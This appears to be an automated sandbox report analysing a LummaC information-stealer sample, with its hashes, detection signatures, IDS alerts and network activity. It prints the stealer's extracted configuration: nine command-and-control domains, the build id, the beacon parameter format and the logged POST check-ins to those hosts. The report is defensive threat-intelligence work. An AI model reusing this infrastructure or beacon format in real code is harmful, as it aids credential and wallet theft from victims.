Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:	Loader.exe
Analysis ID:	1574897
MD5:	55f7f34a571a52caefb86f49f0246390
SHA1:	b25ec3d0943e17ed997b353865f3ceb24a498193
SHA256:	81e2acbd26c2d3dcfba65fdff1c91d0927bfbb5f9d7c923184c97af4edda63f1
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

LummaC encrypted strings found

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Sample uses string decryption to hide its real strings

AV process strings found (often used to terminate AV products)

Detected potential crypto function

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Loader.exe (PID: 4308 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 55F7F34A571A52CAEFB86F49F0246390)

WerFault.exe (PID: 6924 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1568 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["brendon-sharjen.biz", "wrathful-jammy.cyou", "debonairnukk.xyz", "effecterectz.xyz", "immureprech.biz", "deafeninggeh.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "diffuculttan.xyz"], "Build id": "HpOoIh--b58c2f805636"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2140034005.00000000005F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2140310460.0000000000920000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:52:07.012813+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.32.1	443	TCP
2024-12-13T18:52:09.293460+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	104.21.22.222	443	TCP
2024-12-13T18:52:11.588142+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.32.1	443	TCP
2024-12-13T18:52:15.371835+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	23.55.153.106	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:52:07.740970+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.32.1	443	TCP
2024-12-13T18:52:10.020240+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.22.222	443	TCP
2024-12-13T18:52:12.328476+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:52:07.740970+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.32.1	443	TCP
2024-12-13T18:52:10.020240+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49731	104.21.22.222	443	TCP
2024-12-13T18:52:12.328476+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49732	104.21.32.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:52:07.012813+0100	2058040	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	104.21.32.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brendon-sharjen .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:52:05.352965+0100	2058039	1	Domain Observed Used for C2 Detected	192.168.2.4	55439	1.1.1.1	53	UDP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:52:16.289176+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	23.55.153.106	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Loader.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://wrathful-jammy.cyou/api	Avira URL Cloud: Label: malware
Source: https://diffuculttan.xyz/api	Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/	Avira URL Cloud: Label: malware
Source: https://awake-weaves.cyou/api#)	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/pi	Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/	Avira URL Cloud: Label: malware
Source: brendon-sharjen.biz	Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz:443/api	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/api	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/api;	Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/api=(#	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/apij	Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/api6(8	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/l#	Avira URL Cloud: Label: malware
Source: https://effecterectz.xyz/	Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/apio	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.3.Loader.exe.2120000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["brendon-sharjen.biz", "wrathful-jammy.cyou", "debonairnukk.xyz", "effecterectz.xyz", "immureprech.biz", "deafeninggeh.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "diffuculttan.xyz"], "Build id": "HpOoIh--b58c2f805636"}

Multi AV Scanner detection for submitted file

Source: Loader.exe

ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Loader.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: sordid-snaked.cyou
Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: awake-weaves.cyou
Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: wrathful-jammy.cyou
Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: debonairnukk.xyz
Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: diffuculttan.xyz
Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: effecterectz.xyz
Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: deafeninggeh.biz
Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: immureprech.biz
Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: brendon-sharjen.biz
Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: HpOoIh--b58c2f805636

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\Loader.exe

Unpacked PE file: 0.2.Loader.exe.400000.0.unpack

Source: Loader.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\Loader.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49733 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058040 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI) : 192.168.2.4:49730 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brendon-sharjen .biz) : 192.168.2.4:55439 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49733 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.32.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: brendon-sharjen.biz
Source: Malware configuration extractor	URLs: wrathful-jammy.cyou
Source: Malware configuration extractor	URLs: debonairnukk.xyz
Source: Malware configuration extractor	URLs: effecterectz.xyz
Source: Malware configuration extractor	URLs: immureprech.biz
Source: Malware configuration extractor	URLs: deafeninggeh.biz
Source: Malware configuration extractor	URLs: awake-weaves.cyou
Source: Malware configuration extractor	URLs: sordid-snaked.cyou
Source: Malware configuration extractor	URLs: diffuculttan.xyz

Performs DNS queries to domains with low reputation

Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz

Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 23.55.153.106 23.55.153.106

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: brendon-sharjen.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: xgContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=249fd1b9764e54e9d57eedf9; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35131Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 13 Dec 2024 17:52:16 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Controlx equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: brendon-sharjen.biz
Source: global traffic	DNS traffic detected: DNS query: immureprech.biz
Source: global traffic	DNS traffic detected: DNS query: deafeninggeh.biz
Source: global traffic	DNS traffic detected: DNS query: effecterectz.xyz
Source: global traffic	DNS traffic detected: DNS query: diffuculttan.xyz
Source: global traffic	DNS traffic detected: DNS query: debonairnukk.xyz
Source: global traffic	DNS traffic detected: DNS query: wrathful-jammy.cyou
Source: global traffic	DNS traffic detected: DNS query: awake-weaves.cyou
Source: global traffic	DNS traffic detected: DNS query: sordid-snaked.cyou
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: brendon-sharjen.biz

Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.3.dr	String found in binary or memory: http://upx.sf.net
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: Loader.exe	String found in binary or memory: https://awake-weaves.cyou/api
Source: Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awake-weaves.cyou/api#)
Source: Loader.exe, 00000000.00000002.2140057200.000000000062E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brendon-sharjen.biz/
Source: Loader.exe, 00000000.00000002.2140057200.000000000062E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brendon-sharjen.biz/api
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1840010079.0000000000653000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
